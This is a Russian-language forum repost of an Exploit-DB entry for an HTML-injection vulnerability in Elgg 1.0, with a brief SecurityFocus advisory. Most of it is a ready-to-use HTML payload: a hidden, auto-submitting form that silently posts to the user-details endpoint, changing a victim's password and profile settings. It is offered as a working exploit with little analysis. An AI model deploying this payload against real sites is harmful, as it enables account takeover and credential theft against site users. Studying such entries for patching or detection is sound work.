Exploit Curverider Elgg 1.0 - Templates HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34825
Проверка EDB
  1. Пройдено
Автор
LORDDEMON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-06-22
Curverider Elgg 1.0 - Templates HTML Injection
HTML:
source: https://www.securityfocus.com/bid/43871/info

Elgg is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Exploits require the attacker be an authenticated user; this permission may be trivial to acquire.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Elgg 1.0 is vulnerable; other versions may also be affected. 

<body onload="document.forms.g.submit();"> <iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe> <form method="POST" target="my_frame" action="http://www.example.com/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails:update"> <input type=hidden name="id" value="id_victima"> <---------Eye with this <input type=hidden name="profile_id" value="id_victima"> <---------Eye with this </form>
 
Источник
www.exploit-db.com

Похожие темы